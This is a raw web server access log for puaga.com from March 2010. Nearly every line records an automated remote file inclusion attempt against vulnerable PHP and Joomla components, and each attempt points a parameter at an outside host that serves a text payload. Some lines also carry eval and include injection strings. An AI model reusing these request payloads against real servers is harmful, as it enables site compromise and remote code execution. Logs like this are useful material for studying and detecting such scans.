69.163.178.130 - - [07/Mar/2010:07:40:28 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.178.130 - - [07/Mar/2010:07:40:47 -0800] "GET /logs/access_100225.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.displaycom.co.kr/board/ins2tall/evy/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:41:29 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:37 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:37 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:37 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:40 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:40 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:43 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:43 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:47 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:48 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:42:52 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:15 -0800] "GET /delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:15 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:15 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:44:16 -0800] "GET //////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:44:16 -0800] "GET /logs/access_100204.log%20%20///////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:44:16 -0800] "GET /logs///////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:17 -0800] "GET /delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:23 -0800] "GET /logs/access_100203.log%20%20/delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:31 -0800] "GET /logs/access_100203.log%20%20/delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:41 -0800] "GET /logs/access_100206.log%20%20/delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:44:53 -0800] "GET /logs/access_100206.log%20%20/delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:45:39 -0800] "GET /logs/access_100217.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:45:40 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:45:40 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:45:42 -0800] "GET /logs/access_100227.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:45:56 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:45:56 -0800] "GET /logs/access_100217.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:45:56 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [07/Mar/2010:07:46:00 -0800] "GET /logs/access_100227.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:47:11 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:47:18 -0800] "GET /logs/access_100219.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:07:47:28 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:07:48:17 -0800] "GET /logs/access_100213.log%20%20//view.php?dir=http://124.0.94.62///bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:07:48:17 -0800] "GET /logs//view.php?dir=http://124.0.94.62///bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:07:48:17 -0800] "GET /view.php?dir=http://124.0.94.62///bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:49:16 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:49:16 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:49:16 -0800] "GET /logs/access_100225.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:07:49:56 -0800] "GET /logs/access_100222.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:07:49:56 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:07:49:56 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:07:50:28 -0800] "GET /logs/access_100222.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:07:50:28 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [07/Mar/2010:07:50:28 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:50:32 -0800] "GET /logs/access_100220.log%20%20/akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:07:52:14 -0800] "GET /logs/access_100209.log%20%20//view.php?dir=http://124.0.94.62///bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:53:26 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:53:26 -0800] "GET /logs/access_100222.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:53:26 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:53:32 -0800] "GET /logs/access_100225.log/akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:53:32 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:53:32 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:53:32 -0800] "GET /logs/access_100208.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:07:54:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:07:54:08 -0800] "GET /logs/access_100221.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:07:54:09 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:54:12 -0800] "GET /logs/access_100204.log///////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:07:54:13 -0800] "GET /logs/access_100221.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:07:54:13 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:54:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:54:13 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:54:13 -0800] "GET /logs/access_100222.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [07/Mar/2010:07:54:15 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:54:18 -0800] "GET /logs/access_100208.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:54:19 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:54:19 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:54:19 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:07:54:43 -0800] "GET /view.php?dir=http://124.0.94.62///bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:07:54:43 -0800] "GET /logs//view.php?dir=http://124.0.94.62///bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:07:54:43 -0800] "GET /logs/access_100213.log%20%20//view.php?dir=http://124.0.94.62///bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:54:51 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:54:51 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:54:52 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:54:58 -0800] "GET /logs/access_100215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.196.124.3 - - [07/Mar/2010:07:55:01 -0800] "GET /logs/access_100130.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
91.196.124.3 - - [07/Mar/2010:07:55:01 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
91.196.124.3 - - [07/Mar/2010:07:55:01 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:55:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:55:15 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:55:15 -0800] "GET /logs/access_100208.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:55:18 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:55:18 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:55:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:55:20 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:55:20 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:55:20 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:56:03 -0800] "GET /logs/access_100227.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.203.90 - - [07/Mar/2010:07:56:09 -0800] "GET / HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "puaga.com"
91.196.124.3 - - [07/Mar/2010:07:56:10 -0800] "GET /logs/access_100225.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.114 - - [07/Mar/2010:07:56:47 -0800] "GET /logs/access_100215.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.196.124.3 - - [07/Mar/2010:07:57:19 -0800] "GET /logs/access_100130.log%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.ursula1.de/fdh/bodo.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
211.203.180.144 - - [07/Mar/2010:07:57:30 -0800] "GET /logs/access_100220.log/akocomments.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:58:18 -0800] "GET /logs/access_100203.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [07/Mar/2010:07:58:18 -0800] "GET /logs/access_100215.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.36.232.169 - - [07/Mar/2010:07:58:25 -0800] "GET /logs/access_100215.log///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.prozesse-im-unternehmen.de/mac/components/com_joomlastats/images/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:58:28 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [07/Mar/2010:07:58:28 -0800] "GET /logs/access_100222.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
